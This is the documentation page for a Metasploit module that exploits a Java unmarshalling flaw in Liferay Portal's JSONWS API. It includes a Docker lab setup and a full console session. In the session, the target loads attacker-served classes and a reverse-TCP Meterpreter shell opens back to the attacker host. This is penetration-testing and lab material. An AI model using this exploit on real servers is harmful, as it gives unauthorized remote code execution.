metasploit-gs/documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md at 9b59a8e194f9d3bb192d7bdc0e2bd2d91a62720c

adam/metasploit-gs

Fork 0

Files

T

William Vu 9b59a8e194 Be more verbose and validate classloader server

2020-04-14 14:01:18 -05:00

3.0 KiB

Raw Blame History

Vulnerable Application

Description

This module exploits a Java unmarshalling vulnerability via JSONWS in Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1 GA2 to execute code as the Liferay user.

Setup

Run docker run -it -p 8080:8080 liferay/portal:7.2.0-ga1 (note the added 7.2.0-ga1 tag) as per Liferay's Docker Hub instructions.

Targets

Id  Name
--  ----
0   Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2

Verification Steps

Follow Setup and Scenarios.

Options

SRVPORT

If you are testing the Docker container, which binds to port 8080 by default, set this to a different port to bind the remote classloading server to.

Scenarios

Liferay Portal 7.2.0 GA1 from Docker Hub

msf5 > use exploit/multi/http/liferay_java_unmarshalling
msf5 exploit(multi/http/liferay_java_unmarshalling) > show missing

Module options (exploit/multi/http/liferay_java_unmarshalling):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)

msf5 exploit(multi/http/liferay_java_unmarshalling) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(multi/http/liferay_java_unmarshalling) > set lhost 192.168.1.3
lhost => 192.168.1.3
msf5 exploit(multi/http/liferay_java_unmarshalling) > set srvport 8888
srvport => 8888
msf5 exploit(multi/http/liferay_java_unmarshalling) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Liferay 7.2.0 CE GA1 MAY be a vulnerable version. Please verify.
[*] Using URL: http://0.0.0.0:8888/
[*] Local IP: http://192.168.1.3:8888/
[+] Started remote classloader server at http://192.168.1.3:8888/
[*] Unmarshalling remote classloader at http://127.0.0.1:8080/api/jsonws/expandocolumn/update-column
[*] GET /Uphxohekruuokpedknflsriuafhrdsfk.class requested
[+] Sending constructor class
[*] GET /metasploit/Payload.class requested
[+] Sending payload class
[*] HEAD /metasploit.dat requested
[+] Sending 200
[*] GET /metasploit.dat requested
[+] Sending payload config
[*] HEAD /metasploit/Payload.class requested
[+] Sending 200
[*] GET /metasploit/Payload.class requested
[+] Sending payload class
[*] Sending stage (53928 bytes) to 192.168.1.3
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:58271) at 2020-04-08 07:05:47 -0500
[*] Server stopped.

meterpreter > getuid
Server username: liferay
meterpreter > sysinfo
Computer    : 588a96d744cb
OS          : Linux 4.19.76-linuxkit (amd64)
Meterpreter : java/linux
meterpreter >

3.0 KiB Raw Blame History